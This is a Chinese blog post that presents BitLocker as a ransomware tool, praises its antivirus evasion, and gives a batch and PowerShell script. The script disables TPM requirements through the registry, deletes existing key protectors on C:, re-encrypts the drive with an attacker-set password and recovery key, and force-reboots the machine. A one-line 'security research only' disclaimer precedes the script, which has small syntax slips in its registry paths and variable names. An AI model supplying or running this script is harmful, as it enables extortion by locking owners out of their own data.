前言:你以为bitlocker仅仅是用于保护数据嘛?那就大错特错了。当bitlocker黑化也可以用于勒索。1.bitlocker勒索常见的勒索都是勒索软件,基于软件层面的,存在被逆向破解和杀毒软件的风险。bitlocker作为为Windows自带的加密软件,如果以bitlocker为勒索,即有良好的免杀性,加密不需要任何落地文件或者进行远程加载,也不存在被
前言:你以为BitLocker仅仅是用于保护数据嘛?那就大错特错了。当bitlocker黑化也可以用于勒索。
1.bitlocker勒索
常见的勒索都是勒索软件,基于软件层面的,存在被逆向破解和杀毒软件的风险。bitlocker作为为windows自带的加密软件,如果以bitlocker为勒索,即有良好的免杀性,加密不需要任何落地文件或者进行远程加载,也不存在被破解逆向的风险。(且不说微软能不能绕过bitlocker,即使有微软会砸自己招牌嘛?)
缺点:
当然bitlocker也是有一个致命的缺点的,就是无法把收款信息发给受害者,这个需要在勒索之前收集下受害者的信息,通过邮件或者其他方式把你的收款信息发给受害者。
2.bitlocker勒索代码
郑重声明,bitlocker勒索只是一个攻击设想仅可用于安全研究,切勿用于违法犯罪,天网恢恢,疏而不漏望诸位慎重!!!
@echo off
#强制关闭TPM
reg.exe add HKLMSOFTWAREPoliciesMicrosoftFVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
reg.exe add HKLMSOFTWAREPoliciesMicrosoftFVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f
reg.exe add HKLMSOFTWAREPoliciesMicrosoftFVE /v UseTPM /t REG_DWORD /d 0 /f
reg.exe add HKLMSOFTWAREPoliciesMicrosoftFVE /v UseTPMKey /t REG_DWORD /d 2 /f
reg.exe add HKLMSOFTWAREPoliciesMicrosoftFVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
reg.exe add HKLMSOFTWAREPoliciesMicrosoftFVE /v UseTPMPIN /t REG_DWORD /d 0 /f
#不管是否加密先删一波秘钥密码
powershell "
$a = Get-BitLockerVolume -MountPoint 'C';
b=BLV.keyprotector.KeyProtectorId;
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[0];
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[1];
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[2];
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[3];
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[4];
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[5];
Remove-BitlockerKeyProtector -MountPoint 'C:' -KeyProtectorId $b[6];
"
#添加加密秘钥和密码/未加密的进行j加密
powershell "
$pwd = ConvertTo-SecureString '密码' -AsPlainText -Force;
Enable-BitLocker C: -passwordprotector -password $pwd;
Enable-BitLocker C: -RecoveryPasswordProtector -RecoveryPassword 恢复密钥"
"
#强制启动加密
powershell.exe "Get-BitLockerVolume | Resume-BitLocker"
#强制重启
shutdown /f -r -t 0
文由边界骇客